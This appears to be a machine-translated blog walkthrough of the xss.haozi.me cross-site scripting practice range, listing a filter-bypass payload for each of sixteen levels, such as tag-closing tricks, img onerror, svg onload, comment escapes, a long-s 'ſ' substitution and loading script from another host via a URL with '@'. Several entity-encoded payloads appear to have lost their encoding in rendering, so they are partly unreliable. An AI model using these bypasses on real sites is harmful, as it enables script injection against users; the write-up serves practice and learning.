当前位置:网站首页>XSS range intermediate bypass
XSS range intermediate bypass
2022-08-01 19:32:00 【You're still there when you come back from the army】
XSSRange intermediate bypass resolution
靶场环境—https://xss.haozi.me/
第一关:
divBlocks are ordinary elements,直接写入< script >标签即可.
<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>

第二关:
逃脱< textarea>标签,直接闭合.
</textarea><script>alert(1)</script></textarea>

第三关:
escape the double quotes,闭合input.
a"><script>alert(1)</script>

第四关:
Parentheses are already filtered,所以利用mtml实体编码,编译成().
<img src=1 onerror="alert(1)">

第五关:
过滤了括号,反引号,尖括号,还是利用html实体编码.
<img src=1 onerror="alert(1)">

第六关:
Transform into a smiley face,利用注释符,直接闭合.
--!><script>alert(1)</script><!--

第七关:
换行,然后进行过滤
type = "image" src=1 onerror
=alert(1)

第八关:
Backslashes are filtered,尖括号,标签不生效.img标签可以执行,But can't complete tags,htmlwill miss.
<img src ="1" onerror="alert(1)"

第九关:
输出在< style>里面,Only text can appear,不能写js ,闭合< style>也不行.Close with a newline.
</style
><script>alert(1)</script>

第十关:
以https://www.segmentfault.com开头,将script标签闭合.
https://www.segmentfault.com"></script><script>alert(1)//

第十一关:
还是以https://www.segmentfault.com"开头.利用重定向,新建一个txrt文件,写入alert(1).
https://[email protected]/txrt.js
第十二关:
Convert all letters to uppercase.利用实体编码,Convert all letters to 16进制.
<img src=1 onerror=" alert(1)">

第十三关:
Converted to uppercase and filteredscript标签.
<img src=1 onerror=" alert(1)">

第十四关:
Annotated everything,Still using annotations.
alert(1)
-->

第十五关:
利用是“s”可以转化为“ſ”.
<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=alert(1)>

第十六关:
Convert content to entity encoding,But it works.html认识.
aa');alert(1)//

边栏推荐
- Keras deep learning practice - traffic sign recognition
- The solution to the vtk volume rendering code error (the code can run in vtk7, 8, 9), and the VTK dataset website
- app直播源码,点击搜索栏自动弹出下拉框
- 重保特辑|拦截99%恶意流量,揭秘WAF攻防演练最佳实践
- 内网穿透 lanproxy部署
- modbus总线模块DAM-8082
- Keras深度学习实战——交通标志识别
- [Neural Network] This article will take you to easily analyze the neural network (with an example of spoofing your girlfriend)
- 不恰当Equatable协议==方法的实现对SwiftUI中@State修饰属性的影响
- cf:D. Magical Array【数学直觉 + 前缀和的和】
猜你喜欢
随机推荐
部署zabbix
58:第五章:开发admin管理服务:11:开发【管理员人脸登录,接口】;(未实测)(使用了阿里AI人脸识别)(演示了,使用RestTemplate实现接口调用接口;)
Heavy cover special | intercept 99% malicious traffic, reveal WAF offensive and defensive drills best practices
网络不通?服务丢包?这篇 TCP 连接状态详解及故障排查,收好了~
ExcelPatternTool: Excel表格-数据库互导工具
在全志V853开发板试编译QT测试
Find the sum of two numbers
【周赛复盘】LeetCode第304场单周赛
安装win32gui失败,解决问题
有点奇怪!访问目的网址,主机能容器却不行
MySQL开发技巧——并发控制
Tencent Cloud Hosting Security x Lightweight Application Server | Powerful Joint Hosting Security Pratt & Whitney Version Released
How to record and analyze your alchemy process - use notes of the visual artifact Wandb [1]
内网穿透 lanproxy部署
Website construction process
Try compiling QT test on Allwinner V853 development board
百度无人驾驶商业化已“上路”
Ruijie switch basic configuration
【webrtc】sigslot : 继承has_slot 及相关流程和逻辑
数据库系统原理与应用教程(072)—— MySQL 练习题:操作题 121-130(十六):综合练习



![[Kapok] #Summer Challenge# Hongmeng mini game project - Sudoku (3)](/img/8d/4f5f7c2463b781cba1c68370d3c29c.png)




